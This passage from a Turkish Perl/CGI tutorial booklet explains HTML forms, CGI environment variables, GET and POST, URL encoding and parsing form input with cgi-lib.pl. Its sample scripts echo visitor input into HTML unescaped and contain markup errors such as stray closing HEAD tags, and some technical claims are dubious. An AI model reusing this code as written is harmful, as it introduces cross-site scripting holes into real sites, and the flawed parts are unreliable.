Bu kitapçıkta “|” (Pipe, Bağlama) işaretini “veya” anlamına anlamına kullanıyorum. Örneğin
“METHOD=[“POST” | “GET”]” ifadesi, “METHOT=” kelimesinin karşısına, tırnak işareti içinde, ya POST ya
da GET yazmanız gerektiğini belirtiyor.

Türkçe konusunda: Dosya adlarında, HTML’in TITLE etiketinde ve INPUT etiketinin NAME özelliğinde,
Perl programlarında değişken adlarında, Türkçe, Fransızca, Flemenkçe, Vietnamca, yani içinde içinde
non-ASCII karakter bulunan kelime kullanmak hatalıdır. Bunu sadece görünüm açısından değil, fakat
özellikle değişken adlarının daha sonra bulunamaması, hata vermesi gibi durumları önlemek için
yapmamak gerekir. Windows ve Unicode uyumlu işletim sistemlerinde veya kendisini Unicde uyumlu
olmayıp da sonradan Türkçe sistem desteği kazandırılmış işletim sistemlerinde sorun olmayabilir; fakat
cGI programlarınızın nerede, hangi Server’da ve hangi işletim sisteminde çalışacağını bilemezsiniz. Buna
karşılık metin alanlarında Türkçe kullanmak, Browser’ı Türkçe-şifreleme konusunda yönlendiren
komutları unutmamak şartıyla daima mümkündür. Bu ilkeye uygun olarak bu kitapçıkta sistemle ilgili
yerlerde Türkçe kelimelerde Türkçe karakter kullanmaktan kaçındım. Bir çok konuda sık sık imdadıma
yetişen Ahmet Usta ve Osman Hömek, bir çok bilimsel notasyonun Türkçesi konusundaki yardımlarını
Perl konusunda da esirgemediler. Kendilene teşekkür borçluyum.

Bu kitapçığı yazarken, hemen hemen sonuna geldiğim sırada, Selçuk Üniversitesi Teknik Eğitim Fakültesi
Bilgisayar Sistemleri Öğretmenliği bölümünde öğretim görevlisi Sayın Adem Güneş’in Perl ve Perl ile CGI
Programlama ders notlarının farkına vardım. Bu notları http://alaeddin.cc.selcuk.edu.tr/~adem/
adresinde bulabilirsiniz. Bu kitapçığın ileri bir aşamasına gelmemiş olsaydım, Sn. Güneş’in ders notlarını
gördükten sonra boşuna zahmet etmezdim!
CGI / Perl                                                    13
Bazı Türkçe kaynak tarama çabamı kolaylaştıran genç kuşak sayısal tasarımcı ve Web Yönetmeni
arkadaşlarım K. Emre Güray ve Argıt Usuğ'a katkıları için teşekkür ederim.

Bu kitapçığı, Erhan Mataracı’ya ve liselerinin Web sitesini kuran, yöneten ve Perl programını yazmak için
kolları sıvayan diğer kardeşlerime armağan ediyorum. Ama sınıflarını geçmeleri şartıyla!
CGI / Perl                                           14
HTML-CGI İlişkisi


CGI’a ilk adımımızı HTML’in FORM etiketine ilişkin bilgilerimizi atmak çok lyerinde olur. Çünkü
Internet’te istemci ile sunucunun bilinçli şekilde etkileştikleri nokta CGI ise, ikisini bu noktada
buluşturan ögeler, HTML’in Form ve Anchor (<A>) etiketleridir. Form etiketi bir formdaki <Input>
değerlerini, <A> etiketi ise Browser’i CGI programına gönderir.

HTML ile yazılmış ve görüntülenmek üzere Browser programlarına gönderilen metinler başlık ve gövde
olmak üzere iki bölüme ayrılır. Başlık bölümü <HEAD>...</HEAD> etiketlerinin, gövde bölümü ise
<BODY>...</BODY> etiketlerinin arasında kalır. Bir HTML belgesinin başlık bölümünde yer alan bilgilerin
büyük bölümü Browser’da görüntülenmez; ancak Browser bu bölümdeki bilgilere bakarak, HTML
belgesini tanır; bu belgeyi nasıl görüntüleyeceğini öğrenir. Gövde bölümünde ise ziyaretçinin Browser
programının görüntülemesini istediğimiz verileri ve bunların nasıl görüntüleneceğine ilişkin kodlarımız
yer alır. Bu kodların hemen hepsi, bizim, yani Web sayfası tasarımcısının ziyaretçimize göndermek
istediğimiz veriler ve bunların görüntülenmesine ilişkindir; bizden ziyaretçiye, Sunucu’dan İstemci’ye
doğru giden bilgilerdir.

FORM ve onun içinde yer alan INPUT etiketleri ise, tersine işler: istemciden sunucuya, ziyaretçiden
tasarımcıya veri taşır. HTML’in ilk sürümünde Form ve Input etiketleri yoktu; <ISINDEX> etiketi ile
ziyaretçi sadece sitede arama yapabilirdi. Ancak hiç bir Browser (ki o zaman sadece Mosaic vardı!)
tarafından tam uygulanmamış olan bu etiketin yerine HTML’in daha sonraki sürümlerinde istemcinin
sunucuya daha çok bilgi gönderebilmesini sağlayan Form ve Input etiketleri geldi. CGI programlarımızı,
yukarıdaki örnekte olduğu gibi adreslerini doğruca Browser’ın URL adres kutusuna yazarak da
çağırabiliriz. Fakat CGI programlarını çalıştırmanın en yaygın yolu Form etiketidir. Bunu Form etiketinin
ACTION özelliği (attribute) yapar. Hatırlarsanız, FORM etiketini şöyle yazarız:

<FORM ACTION=”cgi-programı” METHOD=[“POST” | “GET”]>...</FORM>

Burada Form etiketinin ACTION özelliğinin karşısına CGI programımızın adını, Örneğin, Perl programının
dosya adının uzantısına göre, ACTION=”/cgi-bin/merhaba.pl” veya ACTION=”/cgi-bin/merhaba.cgi”
yazarız. İstemcinin Form bilgilerini CGI programımıza hangi yöntemle ulaştıracağını belirleyen “Get” ve
“Post” özelliklerinin farklarını birazdan ele alacağız. Şimdilik bunu atlayalım. Bu arada Form etiketinin
başka özellikleri de vardır; bunlardan “Accept=” ile form bilgisini işleyecek olan Server’a, gönderilen
verinin hangi dosya türüne girdiğini, “Enctype=” ile gönderilen verinin nasıl şifrelendiğini bildiririz.

Form etiketinin içinde, onun eylemi (Action) ve yöntemi (Method) ile gönderilecek bilgileri derlemeye
yarayan başka etiketler bulunur. Şimdi kısaca onları ele alalım:

Bir Internet sitesi ziyaretçisinden Input etiketi aracılığıyla tam on ayrı tür bilgi alabiliriz. Input etiketi
şöyle yazılır:
CGI / Perl                                               15
<INPUT NAME=”Bu alanın adı” TYPE=[TEXT | PASSWORD | CHECKBOX | RADIO | SUBMIT
| RESET | FILE | HIDDEN | IMAGE | BUTTON] VALUE=”Alfanümerik değer”
SIZE=”girdi_kutusu_genişliği”>

Input etiketinin kapanmadığını (yani </INPUT> şeklinde bir etiket olmadığını) ve girdi tipine göre daha
başka özellikleri bulunabileceğini hatırlayalım.

Input etiketi ile sunucuya, onun arıcılığıyla CGI’ya gelen bilgiye programcılık dilinde değişken denir.
Değişkeni, sabit bir adı olan fakat içeriği değişebilen bir bilgi tutucu öge olarak düşünebilirsiniz; bir tür
kap. Input’un oluşturduğu değişkenin adı, etiketin NAME (ad) özelliğinden alınır; yani Input’a ad
verirken, daha sonra bu adla bir değişkeniniz olacağını düşünmelisiniz. Bu değişkenin değeri ise Ipnut’un
türüne göre değişir. Örneğin, TEXT (metin) türü Input’un değeri, Browser’da oluşturacağı kutuya
Internet ziyaretçimizin yazacağı kelimelerdir. Input etiketini yazarken VALUE (değer) özelliğini de
yazmışsak, (ve ziyaretçinin bunu değiştirmesi olanağı yoksa), değişkenin değeri VALUE özelliğinin
karşısına yazdığımız alfanümerik (rakam, harfler veya her ikisi birden) metindir.

Bir Form’un içindeki bilgilerle, ziyaretçinin Browser’ından (istemci) kalkıp, bizim Web Server’ımıza ve
oradan da CGI’a gelmesi için, genellikle ziyaretçinin ya klavyesinde Enter tuşuna basması ya da tipi
Submit (Gönder) olan ve Browser tarafından düğme simgesiyle görüntülenen bir başka Input’u tıklaması
gerekir. Fakat “gönder” düğmesi de bir Input olduğu için Form etiketi, içindeki bilgileri paketleyip
gönderirken Submit’in (varsa) değerini de gönderir.

Şimdi “paketleyip gönderme” olayı üzerinde duralım; çünkü hemen hemen tüm CGI kavramı, bu
Internet ziyaretçimizden gelen bu “şey” üzerine kurulacak. CGI programlarımız ziyaretçiden “girdi”
olmadan da çalışabilir. Nitekim yukarıda yazdığımız ilk Perl programı ziyaretçinin bir bilgi vermesini
gerektirmiyordu. Fakat CGI programı, ziyaretçinin IP adresini, öğrenip, kendisine bildirilyordu. IP
numarası, ziyaretçinin sadece bu CGI programını çalıştırmak üzere programın adını Browser’ının adres
hanesine yazması ve Enter’a basması (veya yeni Browser’lardaki Go/git düğmesini tıklaması) ile Browser
tarafından CGI’a gönderilmiş bir bilgidir. Bu yüzden CGI, ziyaretçi isteyerek ve bilerek Server’a bilgi
göndermese de Server ziyaretçiden bilgi edinmesini ve bunu CGI programımıza vermesini bilir! Şimdi bu
bilgilerin neler olduğunu görelim.

CGI programına Server tarafından iki tür bilgi verilir:

1. Browser, Server ve kendisini hakkındaki bilgiler: Browser’ın türü, yetenekleri, Browser’ın Internet’e
giriş noktası (Remote Host, kullanıcı açısından ISS), Server’ın türü, Internet’e bağlandığı geçit (Port), CGI
programının adı, bulunduğu dizin, sahip olduğu değişkenler gibi bilgiler, CGI’a çevre değişkenleri
(Enivonment Variables) kümesi olarak ulaştırılır (Bu değişkenlere bazı kaynaklarda Ortam Değişkenleri
denildiğini görebilirsiniz..

2. Kullanıcının (Internet ziyaretçisinin) girdiği bilgiler: Kullanıcı Browser penceresinde bir Form
doldurmuş ise Form’daki değişkenler ve değerleri (Input etiketlerine verdiğimiz adın değişken adı, bizim
verdiğimiz veya kullanıcının girdiği değerlerin de değişkenin değerini oluşturduğunu yukarıda
görmüştük) de CGI programına aktarılır. Bu aktarma işlemi iki türlü yapılabilir. Form’un METHOD özelliğiCGI / Perl                                             16
GET ise bu bilgiler yukarıda belirttiğimiz çevre değişkenlerine katılarak verilir; METHOD olarak POST
kullanmışsak, bu bilgiler standart girdi (standart input veya Perl’ün ifadesiyle stdin) olarak gönderilir.

CGI programcısı olarak yapacağımız işin özü, bu iki grup değişkeni alıp, içeriklerini kullanılır hale
getirmek ve kullanmaktan ibarettir. Burada ifade ettiğimiz “almak,” “kullanılır hale getirmek” ve
“kullanmak” ifadelerine dikkat edin: çünkü CGI programı ile sadece bu üç işi yapacağız. Dolayısıyla neyi
alabileceğimi, nasıl alabileceğimizi öğrenerek işe başlamak zorundayız. Perl, bir programlama dili olarak
bize bu üç işte kullanabileceğimiz komutları sağlar; fakat bu komutlarlı kullanarak hangi bilgi ile ne
yapacağımızı bilmemiz gerekir.

Çevre Değişkenleri


Aşağıda bir liste göreceksiniz; bu listede bir CGI programının içinde bulunduğu çevrenin bütün önemli
bilgileri yer alıyor. Ama şimdi bu listeye geçmeden, biz kendi bilgisayarımızdan kendi CGI çevremizin
değişkenlerini ve değerlerini öğrenelim. Şimdi, açın en sevdiğiniz düzyazı programını ve başlayın
yazmaya (Eğer illâ kelime iişlem programı kullanmaya kararlıysanız, metni düzyazı, salt metin, ASCII,
ANSI veya “Text only” olarak kaydetmeyi unutmayın):

    print "HTTP/1.0 200 OK\n";

    print "Content-Type: text/html\n\n";    print "<HTML>\n";

    print "<HEAD>\n";

    print "<TITLE>CGI Cevre Degiskenleri</TITLE>\n";

    print "<meta http-equiv=\"content-type\" content=\"text/html;
    charset=ISO-8859-9\">\n";

    print "<meta http-equiv=\"Content-Type\" content=\"text/html;
    charset=windows-1254\">\n";

    print "</HEAD>\n";

    print "<BODY>\n";

    print "<P>\n";

    print "<H1>CGI Çevre Değişkenleri ve Değerleri</H1>\n";

    foreach $env_var (keys %ENV)

         {
CGI / Perl                                             17
        print "<B>$env_var</B> = $ENV{$env_var}<BR>\n";

        }    print "</BODY>\n";

    print "</HEAD>\n";

    print "</HTML>\n";Sonra bu metni örneğin cevre.pl (veya kişisel Web Server’ınızın “.pl” uzatması gibi “.cgi” uzatmasını da
Perl dosyası saymasını sağladıysanız, cevre.cgi) adıyla, kişisel Server’ınızın kök dizinine (Windows
ortamında muhtemelen c:\inetpub\wwwroot olmalı) kaydedin. Ve Browser’ınızın URL adresi hanesine
Server’ınızın protokol ve yol adıyla birlikte bu dosyanın adını yazın (örneğin:
http://benim_server/cevre.pl), klavyede Enter’a basın.

<cgi-perl007.tif>

İşte sizin kişisel Web Server’ınızın cevre.pl veya cevre.cgi programına sağladığı ortam! Bütün
değişkenlerinizi ve değerlerini görüyorsunuz. Muhtemelen kendi bilgisayarınızın burada görüntülenen
bir çok özelliğini tanıdınız: Autoexec.bat dosyasındaki Path satırının değerini, bilgisayarınızın ve
dolayısıyla kişisel Server’ınızın adını, hatta bu programı Windows ortamında çalıştırdıysanız,
Windows’un sürümünü bile görüyorsunuz. CGI, bunları nereden biliyor? Kişisel Web Server’ınız ona
bildirdiği için. Kişisel Web Server bunu CGI nasıl bildiriyor? Çevre Değişkenleri kümesi ile.

//////////////////KUTU/////////////////

“Shebang” nereye gitti!


Kim nereye gitti? Madem ki Perl öğreniyoruz, öğleyse yılların Unixçisi gibi konuşmaya da alışmamız
gerek: # ve ! işaretleri Unix işletim sistemine, aşağıdaki Script’i (betik’i) Perl yorumlayıcısı ile
yorumlamasını ve bu yorumlayıcının nerede bulunduğunu bildirir. “Shebang” [şi-beng] denmesinin
sebebi de müzikte kullanılan diyez (#) işaretinin “Sharp,” ünlem (!) işaretinin de “bang” diye
okunmasından kaynaklanır; ikisine birarada shebang denir. Bu komut satırı genellikle şöşle yazılır:

    #!/usr/local/bin/perl

Bununla Unix işletim sistemine Perl yorumlayıcısının kök dizinde, usr klasöründe, local alt-klasöründeki
bin alt-alt klasöründe olduğunu belirtmiş oluruz. Windows ortamında buna gerek yok; çünkü kişisel
Web Server’ımızı kurduktan sonra Registry kayıtlarında Browser’lara ve diğer ilgili programlara Perl
konusunda kimden nasıl yardım isteyecekleri gösteren değişlikler yapmıştık.
CGI / Perl                                           18
Bununla birlikte, yazacağınız Perl programları kendi bilgisayarınızda ve Windows işletim sisteminde
değil, büyük bir ihtimalle Web sitenize evsahipliği yapan firmanın bilgisayarında ve Unix sisteminde
çalışacak. Dolayısıyla CGI programlarınızda Shebang’e ve Perl’ün yerini belirten ilk satıra ihtiyacınız
olacak. Bundan böyle, kendi bilgisayarımızda ihtiyaç olmasa da elimizi alıştırmak için örnek kodlarımızda
Shebang’e yer vereceğiz. Bunun Windows ortamında hiç bir zararı olmaz. Server’a gönderdiğiniz CGI
programlarınız işlemezse, önce birinci satırda Shebang bulunup bulunmadığına ve yazdığınız yolun
doğru olup olmadığına bakın. Perl yorumlayıcısının nerede bulunduğunu Server operatörüne
sorabilirsiniz.

////////////////////////////////////////////////////KUTU BİTTİ/////////

Kendi bilgisayarımızda CGI’ın çalıştığı çevrenin bu kadar çok değişkeni ve değeri olmasına rağmen,
normal durumlarda CGI programlarımızda bu değişkenlerin tümünü kullanmayız. CGI programlama
açısından önemli çevre değişkenleri ve değerleri şöyle sıralanır:

ÇEVRE DEĞİŞKENİ .......... ANLAMI

REMOTE_ADDR ......................... İstemci bilgisayarın IP adresi

REMOTE_HOST .......................... İstemcinin bilgisayarının adı (Muhtemelen yine istemcinin IP’si)

HTTP_ACCEPT ............................ Browser’ın tanıyabileceği MIME türleri

HTTP_USER_AGENT................... Browser hakkında bilgi (adı, sürümü işletim sistemi, vs.)

HTTP_REFERER .......................... Browser’ın bizim sitemize gelmeden önce görüntülediği son URL
                    (Burada “referer” referansta bulunan, köprü veren, gönderen anlamına
                    gelmekle birlikte, sitemizi ziyaret eden kullanıcının sizim sitemize
                    geçtiği son sitede bizim sayfamıza bir köprü bulunduğu anlamı çıkmaz;
                    ziyaretçi bizim adresimizi URL adres kutusuna kendisi yazsa bile,
                    HTTP_REFERER değişkeninin değeri olarak son URL kaydedilir.)

REQUEST_METHOD ................... GET veya POST

CONTENT_LENGTH .................... POST yoluyla gönderilmiş bilginin boyutu (büyüklüğü). GET yöntemi
                  kullanıldığında veya istemci bilgi göndermediğinde tanımlanmamış
                  sayılır)

QUERY_STRING ......................... İstemcinin GET yoluyla gönderdiği bütün bilgilerden yapılmış bilgi
                    yumağı (String)

PATH_INFO ................................ CGI programının çalıştırıldığı dizine göre (göreli) Path (arama yolu)
                      bilgisi.

PATH_TRANSLATED ................... Göreli arama yolunun gerçek disk ve dizin adlarıyla ifadesi
CGI / Perl                                                 19
Şimdi bu listeye göre kendi kişisel Web Server’ınızın verdiği bilgileri yorumlayabilirsiniz; fakat çok sık
kullanacağımız iki değişkenin, CONTENT_LENGTH ve QUERY_STRING değişkenlerinin tanımlanmamış ve
boş olduğunu görüyor olmalısınız.

Yöntem Farkı: GET ve POST


CONTENT_LENGTH ve QUERY_STRING değişkenlerinin doğrudan bizim Form etiketimizin METHOD
özelliğine bağlı olduğunu farkettiniz mi? METHOD olarak GET veya POST kullanabiliriz. Bu, bizim
ziyaretçimizden nasıl ve ne boyutta bilgi alacağımızı ve bilginin CGI programına nasıl aktarılacağını
belirler.

Form’un oluşturduğu ve sizin GET yöntemi ile aldığınız bilgiler, çevre değişkenlerinden QUERY_STRING
değişkeninin içine yazılır. Başka bir ifade ile Form’daki bütün değişkenlerin adları ve bu değişkenin
içerdiği değer yumak yapılır (bu yumağın niteliğine ve nasıl çözeceğimize geleceğiz!) ve Server’da
QUERY_STRING değişkeninin değeri olarak yazılır. Daha sonra belirteceğiz, ama şimdiden bir kenara
yazın: Form’un gönderdiği değişkenler ve değerleri artık düz metin haline gelmiştir; bundan yeniden
program yoluyla kullanılabilir değişkenler üretmek ve bu değişkenlere ziyaretçiden gelen değerleri
atamak bizim işimiz olacak (ve galiba Perl ile CGI progralamanın da en can alıcı noktasını oluşturacak!).

Form’un bilgilerini POST yoluyla almış olsaydık bunlar CGI programı için standart girdi (stdin) olarak
gelecekti. Bu iki yöntem arasındaki başlıca fark (ve herkesin POST yöntemini tercih etmesinin sebebi)
stdin’in bilgi tutma kapasitesinin sınırsız olmasından ibarettir. QUERY_STRING değişkeni, Server’a, ve bu
programın ayarlarına göre sınırlı boyutta bilgi tutabilir. Formlarınızda çok alan (yani çok değişken ve çok
değer) varsa, mutlaka POST yöntemini kullanmalısınız. Aksi taktirde, bu bilgilerin QUERY_STRING
değişkeninin bilgi tutma kapasitesini aşan bölümü, Server tarafından silinir, CGI programına aktarılmaz.

Çevre değişkenlerimizden REQUEST_METHOD, Form’dan bilgilerin hangi yöntemle geldiğini
gösterdiğinize göre, CGI programımızı yazarken, önce bu değişkenin içeriğini kontrol edebiliriz; bu GET
ise, demek ki Formun bilgileri QUERY_STRING değişkeninin içinde paket halinde duruyor.
REQUEST_METHOD değişkenin değeri POST ise, ziyaretçimizin Formumuza yazdığı bilgiler, stdin olarak
gelmiş ve stdin’in o andaki boyutunu gösteren bilgi de CONTENT_LENGTH değişkenine işlenmiş
demektir. Bunları tekrar ediyoruz; çünkü birazdan bu bilgilerin tümününden, Form bilgilerini kullanılır
hale getirirken yararlanacağız.

Bilgi Yumağı


Peki, bu kadar teori yeter; şimdi bir deney daha yapalım. Hem Form bilgimizi tazeleyelim, hem de
Form’dan gelen bilginin nasıl yumaklandığını görelim. Açın Not Defterini veya onsuz olamadığınız düz
yazı programını ve başlayın yazmaya:

    <HTML>
CGI / Perl                                            20
    <HEAD>

    <TITLE>FORM ORNEGI</TITLE>

    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-9">

    <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">

    </HEAD>

    <BODY>

    <FORM ACTION="isim-yas.pl" METHOD=POST>

    Adınız: <INPUT TYPE=text NAME="isim"><p>

    Yaşınız: <INPUT TYPE=text NAME="yas"><p>

    <INPUT TYPE=submit VALUE="Gönder">

    </FORM>

    </BODY>

    </HEAD>

    </HTML>Bitirince, bu belgeyi isim-yas.htm adıyla kaydedin, fakat kapatmayın; Form etiketinin her iki özelliğini
silin; etiket tek başına (<FORM>) kalsın. Bu dosyayı yeniden fakat adını değiştirerek, örneğin isim-yas-
gecici.htm adıyla, kaydedin. Tamam mı? Şimdi ikinci kaydettiğiniz geçici HTML dosyasını Browser’ınızda
açın. Adınızı ve yaşınızı yazın; Gönder düğmesini tıklayın ve Browser’ınızın Adtres hanesine bakın:

<cgi-perl008.tif>

Burada şuna benzer bilgi yumağını görüyor olmalısınız:

“isim=Mustafa+Durcan&yas=23”

Bu, Form’daki değişkenlerin (“isim” ve yas”), Formu dolduran kişi tarafından verilen değerlerle birlikte
Server’a, oradan da CGI programına sunuluş biçimidir. Browser, bir Form’un Input’larının adları ile bu
alana yazılan değerleri, bir String (bağ) haline getirir; ve Server’a gönderir. Bu String’in oluşturulmasında
şu kuralların izlenmiş olduğuna dikkat edin:

1. Değişken adları kendilerine ait değerle eşittir (=) işaretiyle birleştiriliyor;

2. “değişken=değer” çiftleri “ve” anlamına gelen Ampersand (&) işaretiyle birbirine ekleniyor;

3. Değerin içinde boşluk varsa yerine artı (+) işareti konuyor.
CGI / Perl                                             21
  Bu işleme “URL Encoding” sistemi denir; buradaki örnekte görülmemekle birlikte, standart ASCII
  karakterler dışındaki harfler ve işaretler yüzde (%) işareti ve heksadesimal (16 tabanlı) kodlara çevrilir.

  ////////////////////////KUTU/////////////////////

  Hexadecimal Türkçe!

  URL Encoding şemasında, Türkçe karakterlerin kodları şöyledir:

  ğ: F0

  Ğ: D0

  ı: FD

  İ: DD

  ü: FC

  Ü: DC

  ş: FE

  Ş: DE

  ö: F6

  Ö: D6

  ç: E7

  Ç: C7

  (URL Encoding şemasına göre, yüzde işareti “%25”, Ve (&) işareti “%26” ve çiftçatal (#) işareti ise “%23”
  olarak şifrelenir.)

  ///////////////////KUTU BİTTİ////////////////

  Bu deneyi yapmakla, Browser’ın Form’daki bilgileri Server’a nasıl gönderdiğini görmüş olduk. Şimdi bu
  bilgi yumağını açan bir CGI programı yazalım. Bu sizin ilk form işleme programınız olacak! Evet, Not
  Defteri gibi bir programı açarak, yazmaya başlıyoruz:

#!/usr/local/bin/perl

# isim-yas.pl

require 'cgi-lib.pl'
  CGI / Perl                                             22
&ReadParse(*girdi);

print "Content-Type: text/html\r\n\r\n";

print "<HTML>\n";

print "<HEAD>\n";

print "<TITLE>ISIM-YAS</TITLE>\n";

print "<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-8859-
9\">\n";

print "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-
1254\">\n";

print "</HEAD>\n";

print "<BODY>\n";

print "<P>\n";

print "Merhaba, " . $girdi{'isim'} . ". Sen\n";

print $girdi{'yas'} . " yaşındasın.<p>\n";

print "</BODY>\n";

print "</HEAD>\n";

print "</HTML>\n";  Yazmayı bitirince bu kodu “isim-yas.pl” adıyla kaydetmek zorundasınız. Neden? Çünkü bu programı
  çağıracak veya çalıştıracak olan bir önceki HTML kodunda Form etiketinde ACTION hanesine bu adı
  verdik. “isim-yas.htm” sayfasında Form’u dolduran kişi Gönder düğmesini tıkladığı anda, Browser
  Server’a, “Sizin oralarda ‘isim-yas.pl’ adında bir CGI programı olacak.. Şu yumak yaptığım bilgileri ona
  verir misin, lütfen?” diyecek; Server, bu isimli CGI programını arayacak; bulamazsa Browser’a hata
  mesajı gönderecek; bulursa CGI programına “Al bakalım, sana bir yumak bilgi geldi; ne yapacaksan,
  yap!” diyerek, ziyaretçinin gönderdiği bilgileri devredecektir. Dıolayısıyla Form’un ACTION hanesine
  adını yazdığımız CGI programının belirtilen yerde olmasını sağlamak Web Tasarımcısı olarak bizim
  görevimiz.

  (CGI programcıları Perl programı yazarken, kodun başına dosyanın kendi adını da yazarlar. Burada
  gördüğünüz örnekte Shebang’inin hemen altındaki “# isim-yas.pl” satırı, programcının kendisi ve daha
  sonra bu kodu irdeleyecek veya kullanacak kişiler için aldığı bir güvenlik önlemidir.)

  Biz de birazdan kodumuzu irdeleyeceğiz; ama önce “isim-yas.htm” sayfasını Browser’ınızda açın; Form’u
  doldurup, gönder düğmesini tıklayın; şuna benzer bir karşılık almış olmalısınız:  CGI / Perl                                            23
<cgi-perl009.tif>

Yumağı açalım


Yukarıda, CGI programlarıının yaptığı işleri kavramsal olarak belirtirken, “bilgi yumağını açma” işinin Perl
programının aslî görevlerinden biri olduğunu kaydetmiştik. Yazdığımız Perl programı bunu yaparak,
kendisine String halinde gelen (örneğin: “isim=Mustafa+Durcan&yas=23”) bilgiyi kullanılabilir hale
getiriyor. String halindeki verinin kullanılır hale getirilmesine Parsing (dilbilgisi bilimindebir cümleyi
gramer bakımından incelemek anlamına gelir) denir. Form’dan gelen ve adeta birbirine girmiş ve hatta
şifrelenmiş olan değerlerin açılması, eşittir (=) işaretinin solundaki kelime, rakam veya işaretin değişken
adı, sağındakilerin değişkenin değeri haline getirilmesi gerekir. Bu arada artı (+) işaretinin yerine boşluk
konması, önünde yüzde işareti bulunan iki karakterin URL Encoding şemasına göre harfe veya işarete
çevrilmesi şarttır. Aksi taktirde değerlerimizi kullanamayız. (“Sizin adınız Hakk%FD+%D6cal’dır” diye bir
karşılık verdiğimizi düşünebiliyor musunuz?)

Fakat biz Web amaçlı CGI programcıları bu bakımdan şanslıyız; çünkü ciddî programcılık amacıyla Perl
öğrenmiş Steven K. Brenner gibi uzmanlar, oturmuş bir CGI programına GET veya POST yöntemiyle
gelebilecek verileri inceleyip, değişken=değer çiftlerini ortaya tıkartan ve bunu Perl’e dizi değişken
olarak öğreten program parçacıkları yazmışlar. Bizim bütün yapacağımız, Perl Kitaplığı (Library) adı
verilen bu program parçacıklarını kendi Perl programımızda kullanılır hale getirmektir. Böyle, dışarıdaki
bir Perl programını kendi programımızın içinde kullanmak istersek, kendi programımızın başında Perl
yorumlayıcısına (örneğin perl.exe) bizim programı icra etmeye başlamadan önce dışarıdaki bu kitaplığı
alıp, çalıştırmasını bildirmemiz gerekir. Buradaki örneğimizde bunu, “require 'cgi-lib.pl'” satırı ile
yapıyoruz. Bu satırdaki require komutu, bizim bilgisayarımızdaki perl.exe’ye veya Server’ın bulunduğu
bilgisayardaki Perl yorumlayıcısına işe başlamadan önce “cgi-lib.pl” adındaki Perl programını
çalıştırmasını bildiriyor. “cgi-lib.pl” programını Steven K. Brenner 1995’te yazarak Prel programcılarına
armağan etmiş bulunuyor. (Bu programı, bu kitapçığın örnek dosyaları arasında bulabilirsiniz.)

“cgi-lib.pl” programında bir kaç fonskiyon tanımlanmış bulunuyor. Perl’ün defalarca yapması gereken
işleri, bu işin yapılması için gerekli bilgi kümesi ve komutlarla birlikte bir grup haline getirir ve bu gruba
bir isim verirsek ortaya bir fonksiyon çıkartmış oluruz. Sözgelimi, Perl’e “Filanca yerdeki şu String’i al;
içindeki filanca işareti bul; eğer bu işaret şuna eşitse, önündeki grubu dizi değişken adı yap...” diye bir
dizi komut verebilirdik. Fakat bu hem yorucu olurdu; hem de hata yapma olasılığımızı arttırmaya
yarardı. Oysa, “cgi-lib.pl” programında Parsing işlemi için geliştirilmiş fonksiyonlar var. Biz bu
fonksiyonların yaptığı iş kümesine ihtiyaç duyduğumuz yerde kendi yazdığımız Perl programına
“Steven’ın programındaki filanca fonksilonu al, ne emrediyorsa yap, sonucu da gel bana bildir!” dersek,
işlerimiz daha kolay hale gelmiş olur.

İşte bu tür, bir isim altında toplanmış işlem paketlerine Function (işlev) adı verilir; Perl diğer bütün
programlar gibi kendisine “Şu fonksiyonu yap!” dediğiniz noktada yapmakta olduğu işi durdurur ve
fonksiyon paketindeki işleri yapar; bu paket ortaya bir değişken veya sonuç çıkartıyorsa, o bilgiyi
CGI / Perl                                              24
edinmiş olarak yarım bıraktığı işleme geri döner. Fonksiyon yazmamızdaki veya hazır fonksiyonları
kullanmamızdaki birinci sebep, Perl’e, Fonksiyon’un sağlayacağı bilgiyi kazandırmaktır.

Perl’ün yukarıdaki örneklerde kullandığımız bazı komutları, örneğin “print” komutu aslında Fonksiyon
diye adlandırılır; eğer biz bir fonksiyon yazıyorsak, buna subrutin (subroutine) denir. Daha sonra
subrutin yazmayı göreceğiz; şimdi sadece Steven’ın (veya kendi Perl’ümüze eklediğimiz herhangi bir
haricî kitaplık dosyalarındaki) subrutinlerine nasıl atıf yaptığımıza dikkat edelim. “cgi-lib.pl”
programında tanımlanmış olan “ReadParse” subrutin’i, GET veya POST yoluyla alınmış veriyi okur ve
bunları—türünü ve niteliğini daha sonra göreceğimiz—dizi değişkenlerin (array) içine yazar. Perl işine
iyice ısındığımıza göre, bu dilin kendi argosunu öğrenebilmek için belirtelim: Perl’de buradaki gibi
dışarıdan aldığımız “değişken=değer” çiftlerine “anahtar/değer” denir; “değişken” adı Perl’ün kendi
içinde oluşturduğu veri tutma alanları için kullanılır.

Perl programcılık çevrelerinde bir çok kitaplık-program bulabilirsiniz; cgi-lib.pl’nin en çok kullanılan
kitaplık olmasının sebebi, anahtar/değer dizisinin yazılacağı değişkenin adını bizim verebilmemizdir. cgi-
lib.pl’in GET veya POST verisini okuyan ve irderelen subrutininin adı ReadParse’dır; dolayısıyla bu
subrutine biz &ReadParse şeklinde göndermede bulunuruz. Bu gönderme “&ReadParse(*girdi);”
şeklinde yapılır. Bu komutla, cgi-lib.pl programına “Benim GET veya POST verilerimi okuyur,
anahtar/değer çiftlerini bul; bunları ‘girdi’ isimli dizi değişkenin içine yaz!” demiş oluyoruz. Form’un
bulunduğu HTML sayfasını tasarlayan biz olduğumuza göre, Input etiketlerimizin adlarını (yani CGI’da
anahtar/değer çiftinde anahtar olacak kelimeleri biliyoruz. (Buradaki örnekte, “isim” ve “yas”.) Eğer
“isim” adlı anahtarın değerini bilmek istiyorsam, bütün yapacağım şey, ‘girdi’ dizi-değişkeninin “isim” ve
“yas” adlı anahtarlarının değerlerini sorgulamaktan ibaret. Bunu “$girdi{'isim'} “ ve “$girdi{'yas'}”
ifadeleriyle yapıyoruz. Fakat henüz Perl’ün yapı taşları olan değişkenleri tanımadığımız için, bunun
üzerinde durmuyoruz. O da ilerde!

//////////////////////////////KUTU/////////////////////////////////

İki önemli HTML etiketi


CGI’ın HTML’in Form ve Input etiketleri ile yakından ilgili olduğunu gördük; ne var ki HTML ile işimiz
bitmedi. Gerçekten de HTML belgesindeki bir çok etiket, CGI programımızla ilgili olabilir veya biz CGI
programıyla oluşturduğumuz HTML belgelerinde bu etiketleri ve içeriklerini yazabiliriz. CGI tasarımcısı
için HTML bilgisi çok önemlidir. Burada bazı HTML etiketlerine ilişkin bilgilerimizi kısaca tekrar edelim.
